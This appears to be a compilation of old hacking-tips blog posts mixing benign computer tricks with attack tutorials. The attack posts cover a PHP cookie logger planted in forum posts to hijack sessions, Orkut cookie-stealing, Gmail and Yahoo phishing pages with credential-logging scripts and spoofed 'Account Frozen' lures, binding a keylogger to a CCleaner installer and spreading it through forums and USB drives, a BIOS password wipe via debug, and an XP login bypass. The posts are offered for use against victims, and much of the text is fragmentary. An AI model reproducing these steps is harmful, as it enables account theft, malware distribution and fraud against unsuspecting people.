

Tracing Emails:

While sending or receiving an email ,our browser uses two protocols:
SMTP(Simple mail transfer protocol)Port 25
POP(Post office protocol)Port 110

Whenever click on the send button of your browser for sending a mail,
the mail first reaches the Source mail server from there it goes to Int-
erim mail server from there it moves to Destination  mail server and at
last to destination inbox.
So as you see its not a complicated process and can be described by
the following diagram:

Sender Outbox-----> Source Mail Server-----> Interim Mail Servers----->
Destination Mail Server------> Destination Inbox.
All the emails does not travel alone they carry email header with them.
This email header reveals the path taken by the email to reach its

Tracing Time:
Here I will take a real life example of a email that was send to me.
The email header is:

From John Fri Jun 25 20:36:53 2010

X-Apparently-To: via; Fri, 25 Jun 2010 20:36:53 +0530

Return-Path: <>


X-Originating-IP: []

Received: from  (HELO (

by with SMTP; Fri, 25 Jun 2010 20:36:53 +0530

From: John <>

Subject:Stop paying for CDs.

Date: Fri, 25 Jun 2010 11:06:53 EDT

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

Before tracing the first thing is to divide the mails in 3-4 lines and then
I will explain you each line.
So lets begin:
Date: Fri, 25 Jun 2010 11:06:53 EDT

From: John <>

Subject:Stop paying for CDs.

Date: Fri, 25 Jun 2010 11:06:53 EDT

This line tells us the date on which the mail was sent to me.
From: John <>

This line tells me the email of the person who sent the the mail.
This line tells us to whom the mail was sent , in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.

X-Apparently-To: via; Fri, 25 Jun 2010 20:36:53 +0530

Return-Path: <>


X-Apparently-To: via; Fri, 25 Jun 2010 20:36:53 +0530

This line tells me the that the message was sent to my email via
on Friday 25th june 2010.
Return-Path: <>

again this line tells me the email of the person who send me this mail.

This line tells me that the message was filtered by
X-Originating-IP: []

This line tells me the IP address of the person who send me this email.
Received: from  (HELO (

by with SMTP; Fri, 25 Jun 2010 20:36:53 +0530

Again this line tells us the IP address of the person who sent this mail
and contain some SMTP command which you will learn in the next lesson.

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

MIME-Version: 1.0
This line tells me the software that the attacker used to send me the
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of the text the email used.
The header can be viewed by going to action in yahoomail and in gmail it would be found in settings. If you use some other website then the best way is to find it using google.
Now if you hve got the IP ddress wht cn you do?
The answer is very simple you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts.When i did a whois scan for the

IP Information for



Create a CookieLogger and Hack any Account

What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
if (!$handle = fopen($filename, ‘a’))
echo “Temporary Server Error,Sorry for the inconvenience.”;
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
echo “Temporary Server Error,Sorry for the inconvenience.”;
echo “Temporary Server Error,Sorry for the inconvenience.”;
echo “Temporary Server Error,Sorry for the inconvenience.”;
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php ->
logfile.txt -> (chmod 777)
fun.gif ->
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for



New cookies stealing from mozilla firefox !!!

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

  • Firstly you need have Mozilla firefox.
  • Download cookie editor plugin for Mozilla firefox.
  • You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts
Cookie Script:



How to use cookies script?
1. Replace your number " UserId.value=33444211 "
How to Replace your Number ????
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg
It will be a Eight Digit Value.
3. Now replace your value with the value in the java script .
4. Now Your script will look like




5. Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
6. You'll Get his cookie in your scrap book
7. After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
8. click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.




Pishing with gmail

This is the most common attack. In this attack the attacker creates a fake page and sends it to the victim. The victim fills the login information and when he clicks on login the information is send to the attacker.
               The Method:
Here we will make a fake page for gmail.
-Go to and save the home page.
-Rename it to index.html
-type the following script in notepad and save it in the same dictionary as gmail.php and create another text file and name it to passwd.txt

he=2 “);
$handle = fopen(“passwd.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable); 
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”); 
Fwrite($handle, “rn”);
-Edit the main gmail page in the notepad and press + F and type action and press “Find Next”.
You should see this:

-Change the link between''action='' to gmail.php.After this link you will see method=''post''
change it to method=''get''
-Save everything and upload it to a free hosting site make sure to give writing permission to passwd.txt
so now send the link to any one and when he fills everything then his username and password will get saved in passwd.txt so to view it you will have to type

These were some of the methods to crack a password. Other method include compromising the website/computer which will be explained in My book "Ethical Hacking the forbidden guide".



Make your Own Text to Talk Software in Windows XP

1. Open the Notepad File and Copy the Text Given Below..

Dim msg, sapi
msg=InputBox("Enter your text","My Talking Software")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

2. Now Save the File as anyname.vbs (note that vbs Extension).

3.Now Open the anyname .vbs  file and Write the Text that you want that Xp will speak...

4. Click on Ok and See that your Xp is Spaeking the Text...

Enjoy and Have Fun!



How To Trace an Email Address And Original Sender?


The purpose of this guide is to show the process involved in tracing an email. The first step required to tracing an email is finding out the headers of the email. What are headers? Email headers are lines added at the top of an email message that are used by servers as the email goes on route to get delivered. Generally email clients only show the standard To, From, and Subject headers, but there are more.

1) Enabling Email Headers

Enabling Email Headers For Gmail
Step 1:Once Logged into your Gmail Account open the Email whose headers you want to view. Click on the “More Options” link in the message next to the date of the email. 

How To Trace an Email Address And Original Sender

Step 2: Now click the “Show Original” link.

How To Trace an Email Address And Original Sender

Step 3: This link will popup a new window the headers and the body of the message.

How To Trace an Email 

Address And Original Sender

Enabling Email Headers For Hotmail

Step 1:Once logged in, click on the "Options" link in the upper navigation bar.

How To Trace an Email 

Address And Original Sender

Step 2: Now click on the "Mail Display Settings" link. 

How To Trace an Email 

Address And Original Sender

Step 3: Change the "Message Headers" option to "Full" and click ok.

How To Trace an Email 

Address And Original Sender

Step 4: Go to your inbox and open any one of your email. You emails show now contain additional headers.

How To Trace an Email 

Address And Original Sender

Enabling Email Headers For Yahoo

Step 1:Once logged in, click on the "Options" link in the upper navigation bar. 

How To Trace an Email Address And Original Sender

Step 2: Now click on the "General Preferences" link.

How To Trace an Email Address And Original Sender

Step 3: In the paragraph titled Messages and locate the "Headers" heading and select "All".

How To Trace an Email Address And Original Sender

Step 4: Go to your inbox and open any one of your email. You emails show now contain additional headers.

How To Trace an Email Address And Original Sender

2) Understanding Email Headers

How To Trace an Email Address And Original Sender

In this example the “Sender” located at want to send an email to “Receiver” located at The sender composes his email at his workstation in the university’s computer lab ( Once completed the email message is passed to the university’s mail server called The mail server seeing that it has a message for, contacts mail server and delivers the email to it. The email is stored on server until Receiver logs on to check his/her inbox.

In this example, four headers will be added to the email message. This first header is generated by email client on when forwarding it to the mail server at

How To Trace an Email Address And Original Sender

The following header is added when transmits the message to

How To Trace an Email Address And Original Sender

The following header is added when stores the message on the server for Reciever.

How To Trace an Email Address And Original Sender

The following header is added when Reciever downloads the email from home machine called reciever.local. 

How To Trace an Email Address And Original Sender

3) Tracking The Orginal Sender

The easiest way for finding the original sender is by looking for the X-Originating-IP header, this header is important since it tells you the IP Address of the computer that had sent the email. If you can not find the X-Originating-IP header then you will have to sift through the Received headers to find the sender's ip. 

How To Trace an Email Address And Original Sender

Once the email sender's ip is found go to to begin a search. 

How To Trace an Email Address And Original Sender

Now click on the "NET-24-16-0-0-1" link. 

How To Trace an Email Address And Original Sender

Scroll down the page untill you find the OrgAbuseEmail field. 

How To Trace an Email Address And Original Sender

Remember to include all the headers of the email along with an attached copy when filling a complaint.



How to Protect an Email Account from Being Hacked?

If this is the case, then what is the reason for many people to lose their accounts?

The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.

Are you confused? If so continue reading and you’ll come to know…

Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.


Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.

For example a Spoofed Website of appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.


* Never try to login/access your email account from the sites other than the original site.
* Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.


The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.


Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.


Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.

So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked.




How To hack Facebook Password

Hello friends today i will explain you how to hack the Facebook password or accounts remotely using keylogger. Its a 100% working hack and you can easily hack anyone’s Facebook account or password using this hack. In this tutorial i will explain you how to hack Facebook and other passwords of any user using 100% FUD keylogger. The keylogger in this tutorial we will discuss is L33ts keylogger and its 100% FUD(fully undetectable).
Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don’t worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.  NOTE: This tutorial is for Educational purposes only i.e. to make you aware how hackers hack your Facebook accounts. Please don’t misuse it. I and Isoftdl is not responsible for any damage caused by you.
So guys lets start hacking Facebook account or passwords….
Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.
Step 1. Creating the Keylogger Server
1. Download the keylogger.
2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).
3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it’s details in this.

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.
Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.
how to hack  facebook passwords,facebook hack, how to hack into someones facebook
4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).
Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it’s Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.
facebook  password hack,how to hack someones facebook,facebook password  hacker,facebook hacking
5. Now again go to File’s menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.
Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software’s to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn’t that so easy to hack anyone’s Facebook account in just few minutes.
How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don’t use cracked softwares and don’t download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.





Bypass/Hack - Url shortener service

we all know, there are tons of ways for making money online like pays bucks for each advertisement seen using your shortened link. The link viewer has to wait for 5 seconds until the advertisement loads and only after 5 seconds, he can view the actual  page.

By Doing The Thing I gave You below will help you to bypass advertisement. By using this hack, you don't need to wait for counter to go to zero.

To bypass/hack, you need to have Firefox browser with Greasemonkey installed. You can install Greasemonkey firefox addon, if you haven't installed yet.

1. Go to Hacker script page to bypass/hack advertisements.

2. Hit on Install and confirm the script installation in your Greasemonkey.

3. Now, whenever you'll click on any shortened link, you won't see any timer or counter of 5 seconds. The actual  page will appear.

Hope You Guyz like it


Gmail DOT Trick : Great Amazing Trick

Hey Guys I have came across a new Great Amazing Trick that is GMAIL DOT TRICK…Its really amazing ..check It.

Suppose There is a Gmail account :
having password : abcdYou will get logged in to If you use
email as :
password : abcd
email as :
password : abcd
email as :
password : abcd
email as :
password : abcd
email as :
password : abcd
and so on..That means gmail does not count periods (.). So isnt its Great … So you can use this trick for using the same email for various GPT, PTC, Twitter accounts as they interpret all the above emails as different but gmail considers it the same. 

How to bypass Paypal Limited Account (Working)

The Limits of An Paypal Account can not only removed by Verifying your Paypal Account. But If you want to Buy some things like Domain etc.. You need to Do More…

Few reasons can make PayPal account limited are: Big size of withdrawals, Too Many refunds or chargeback, sum of money going through account, Credit/debit card that does not check out.

Tips to avoid your PayPal account from becoming limited:
  • Do not open a brand new account and accept a large amount of money right after verification process.
  • Don’t frequently change your account information.
  • Do not add or remove credit cards on your account frequently.
  • When you receive a large amount of money do not try to immediately withdraw the money, or send it to another account because you might mistrusted of having received fraudulent funds.
  • While you should keep a little balance of your dollar in your PayPal account.

If your account has limited (the solutions)
To solve if your PayPal account limited, login to your PayPal account and open “Resolution Center” on your PayPal account to remove limitations and complete all checklist item to restore the account by clicking resolve button.
Each PayPal case is usually different. On the case of my PayPal account limited, I must upload the following data:

  • Confirm credit card
  • Upload copy of your utility bill (proof of address).
  • Upload copies of national ID card, driver’s license or passport.

Now, after doing all checklist item on the resolution center your Paypal Account Restrictions and Limitations will be Removed.
So Enjoy Guys and have Fun!

How to Verify PayPal without Credit Card or Debit Card

I am going to share with you all “How to verify the Paypal Account Without having Credit Card or Debit Card” . This is the General Problem, So we are discussing that.Most of us Think that its Pity Difficult to verify Paypal Account without Credit or Debit Card but believe me Guys its Easy like 123… in a Go…So Read On…

For Verifying Paypal Account you will need two Things:
1. A Paypal Account (lol its Obvious).
2. A Bank Account (that you will attach with paypal to verify ur Account).

Follow the Below Simple Steps to Verify your Paypal Account and Enjoy the Full Features of Paypal Without Restrictions:  Step1 : Login to your PayPal account then Open “my account Tab”. Go to “Profile” then click “Add/edit Bank Account”.  Add and then complete all the needed information.

Step2: PayPal will email you a notification on how to confirm your bank accountand get verified. PayPal will make two small deposits to your bank accounton a specific date.

Step3: Check your bank account and note the exact amounts of those deposits.

Step4: Log in to your PayPal account and click Confirm bank account on the Account Overview page. Enter the two deposit amounts to get verified.

That’s all the Process to Verify the Paypal Account. So Enjoy Guys.
If you have Any Query Ask in Form Of Comments :) 

Hidden Skype Emoticons and Smileys – Really Amazing

Did you know that apart from a widely used VoIP service, Skype is also a well structured and developed instant messaging service?Skype provides a cool user interface to chat with your online friends and it also provides several emoticons and smileys to convey your moods or feelings with little icons. Here is a list of the all hidden emoticons and smileys that you can use while chatting with your Skype friends.


How to use Skype Hidden Smileys or Emoticons?

Unlike Yahoo Messenger or any other instant messaging service, Skype smileys don’t appear upon hitting a combination of symbols. In fact you have to enter the smiley code, which are usually named as the emotion (emotion=emoticon) while chatting with your friends.

Skype Hidden Emoticons, Smileys

Smiley Icon Smiley Name Smiley Code to Type
Mooning (mooning)
Finger (finger)
Bandit (bandit)
Drunk (drunk)
Smoking (smoking)(smoke)(ci)
Toivo (toivo)
Rock (rock)
Headbang (headbang)(banghead)
Bug (bug)
Fubar (fubar)
Poolparty (poolparty)
Swearing (swear)
TMI (tmi)
Heidy (heidy)
MySpace (Skype v3.6) (myspace)

While few of the above smileys or emoticons work with Skype 3.0 or above versions only, others will work on Skype 2.5 or later version.

How to Find Who is Invisible or blocked you on Google chat/Gtalk

Hello friends, i’m sharing mind boggling tutorial that is “How to find who  is invisible or blocked you on Google chat/Gtalk”. So guys are you ready to know that which of your friend has blocked you on google talk.
hack gmail,hack gtalk,find invisible or blocked
Whenever you noticed a contact in your Gtalk/Google Talk has not been online for some time, have it ever crossed your mind you’ve been blocked? If you are curious in finding out who actually blocked you in Gtalk, here’s a workaround you can try.
This following method we attempt to show make use of a chat client call Pidgin.  STEPS TO FIND WHO IS INVISIBLE OR BLOCKED YOU ON GOOGLE CHAT:

1. Download, Install Pidgin

Click here to download Pidgin chat client. If you already have Pidgin installed, you may skip this step.

2. Configure Pidgin for Gtalk

You’ll probably start with the below screen. Click the Add button. “Accounts -> Manage Account” will also bring you to the same screen. Let’s add Gtalk to Pidgin.
hack gmail,hack gtalk,find invisible or blocked
Configure Pidgin Welcome Screen

Clicking Add will allow you to add new Gtalk account. The following two screenshots show what you need to fill up for Basic and Advance tab, pay attention to those highlighted.

hack gmail,hack gtalk,find invisible or blocked
Add Account Basic Tab
hack gmail,hack gtalk,find invisible or blocked
Add Account Advanced Tab

With all the settings properly entered, you should be able to connect to Gtalk and load your contacts successfully. Now let’s go find out who blocked you.

3. Who’s Blocking You?

When someone blocked you in Gtalk (and other IMs), they appear offline just like your other contacts who are really offline. Right click, click on Get Info, and we’ll see how to differentiate them.
hack gmail,hack gtalk,find invisible or blocked
Get Info that who has blocked you or simply hiding Himself
The following image is a comparison of 2 different contacts: Actual offline (left) and Blocked offline (right). If you are blocked, nothing will be display under Buddy Information.

hack gmail,hack gtalk,find invisible or blocked
Comparision of Person who is offline and person who is invisible.

Thats all Now you can easily find out who is really offline and who is blocking you from google chat. So guys I hope you all have enjoyed it.
If you like our posts , then please comment . All queries are heartily welcomed.
Enjoy and have happy Hacking!

3 Hacks for Firefox That Will Double Your Internet Browsing Speed

There are many people out there complaining about the Firefox RAM Memory Bug. Lets get it straight. It’s not a bug. It’s part of the cache feature. This ‘feature’ is how the pages are cached in a tabbed environment.
To improve performance when navigating (studies show that 39% of all page navigations are renavigations to pages visited less than 10 pages ago, usually using the back button), Firefox implements a Back-Forward cache that retains the rendered document for the last five session history entries for each tab.
This is a lot of data. If you have a lot of tabs, Firefox’s RAM memory usage can climb dramatically. It’s a trade-off. What you get out of it is faster performance as you navigate the web.
Now a lot of us have found the ’secrets’ on how to manipulate settings in “about:config” to drop the memory usage as long as possible and to increase the speed at which Firefox loads sites. Read on to find out how to do this.
Remember: Firefox (download it here) is the best internet browser available (in my opinion), and these tweaks below will make it even greater and faster. So enjoy!

Reduce the amount of RAM Firefox uses for it’s cache feature

Here’s how to do it:
1. Type “about:config” (no quotes) in the adress bar in the browser.
2. Find “browser.sessionhistory.max_total_viewer
3. Set it’s value to “0“;(Zero)

Increase the Speed in Which Firefox loads pages

1. Type “about:config” into the address bar and hit Enter.
(Normally the browser will make one request to a web page at a time. When you enable pipeliningit will make several at once, which really speeds up page loading.)
2. Alter the entries as follows:
Set “network.http.pipelining” to “true
Set “network.http.proxy.pipelining” to “true
Set “network.http.pipelining.maxrequests” to some number like 10.
This means it will make 10 requests at once.
3. Lastly, right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0“;.(Zero)
This value is the amount of time the browser waits before it acts on information it receives. If you’re using a broadband connection you’ll load pages faster now.
Optionally (for even faster web browsing) here are some more options for your about:config (you might have to create some of these entries by Right Click –> New– > Interger or String
network.dns.disableIPv6: set “false”
content.notify.backoffcount”: set “5“; (Five)
plugin.expose_full_path”: set “true”.
ui.submenuDelay”: set “0; (zero)

Reduce RAM usage to 10mb when Firefox is minimized:

This little hack will drop Firefox’s RAM usage down to 10 Mb when minimized:
1. Open Firefox and go to the Address Bar. Type in about:config and then press Enter.
2. Right Click in the page and select New -> Boolean.
3. In the box that pops up enter config.trim_on_minimize”. Press Enter.
4. Now select True and then press Enter.
5. Restart Firefox.
These simple tweaks will make your web browsing with Mozilla Firefox 2-3 times faster and easier. And I think they are fairly easy to apply. Enjoy!

Play with google images:

Go to Code:1.
2. Click “images”
3. Fill in “bikes, flowers, cars” or any other word.
4. You will get a page with alot of images thumbnailed.
5. Now delete the URL on the addressbar (example:
PHP Code:
6. Copy the script down here, and paste it in your adressbar !

And see the magic.

Increase ur RAM and so ur System Speed:

1). Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don’t use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM. In any multitasking system, minimizing an application means that it won’t be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM. 

Hack into Windows Xp without changing the password:

Steps to hack into a windows XP computer without changing the password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE.
3. You’ll get DREAMPACK.iso.
4. Use any burning program that can burn any ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows2000 setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (normally it will be “1” if you only have one windows installed).
9. Backup your original sfcfiles.dll by typing the following:
ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld
10. Copy the hacked file from CD to system32 folder. Type the following:
copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll(here I have mentioned my default drive as D)
11. Type “Exit”, take out the disk and reboot.
12. In the password field, type “dreamon” and the DreamPack menu will appear.
13. Click on the top graphic on the DreamPack menu and you will get a popup menu.

Shake The Firefox and Internet Explorer:

Shake the Mozilla Firefox and Internet Explorer n See Magic.
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i–) {for (j = n; j > 0; j–) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)


Email Spoofing 2010:

Hey today i am going to tell you what is email spoofing. Email spoofing refers to send fake email with fake ID. This is common activity these days. This is done to fool people to give out personal information like credit card number. Sometimes we receive an email from bank. Which looks authenticate  to you but sometimes it can be an email spoofing attack. Earlier this attack was done by an telnet by SMTP servers, but now this technique is not working. So i decided to show you how to spoof  email with an website and a tool.
So first i show how to spoof email with an website.
So the steps are:
1:) First go to
2:) Then fill all the information required.
3:) Then check your email
By this way you have send an fake email  using email spoofing technique.
This can also be done by using a tool. To download that tool click here
Just open that tool and follow the on screen instructions and enjoy……….. BUT THIS FILE MAY BE WARNED BY ANTIVIRUS BECAUSE IT IS A HACKING SOFTWARE.

How to Hack

Since I started blogging the question that has been asked by maximum number of users via Comments, Web Forms or via Communities is “How to hack”. Rapidshare is one of the best file hosting service in the world. You can upload, Download files that you want very easily. But if you are not a premium user of Rapidshare then while downloading any file from the rapidshare, you will get annoying download time before getting the download link.
Today I am posting the answer to your most asked question via a very simple trick which will help you to reset the download waiting time to zero. So you can download your files very quickly.
Follow the steps given below and hack yourself:
1. Goto the Rapidshare URL of the file you want to Download.

2. Now click on the Free User button. Your waiting time will be start.

3. Now remove the current URL and copy the follwing code in the Browser’s address bar;

4. Hit Enter.
5. This code will set your download timer as zero and download link will be appear immediately.
6. Click Download. If it gives some error message, refresh the page once and download will start.
You could also add the following link to bookmarklets and use it whenever you want to circumvent Rapidshare Wait Time.

How to Remove Recycle Bin Icon in Windows XP:

If you Want to Remove Your Recycle bin icon From Desktop

If using XP ProGo to START > RUN
On the right hand pane find ” Remove Recycle Bin icon on the desktop ” , double left click on it to ENABLE it.
If using XP Home
Create or modify the following registry entry
If you like the post, please do comment and link
this post through bookmarking sites. You can use share this link by clicking on the icons below.

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Here is the Best way to Crack the BIOS password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack. But in this new version this problem is eliminated and this is has become more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be and for google it is After registering you will get an email from the web form designer with your form id.
Now follow the following steps :
  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=” Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.
First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site”.
Now select your site name as You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.
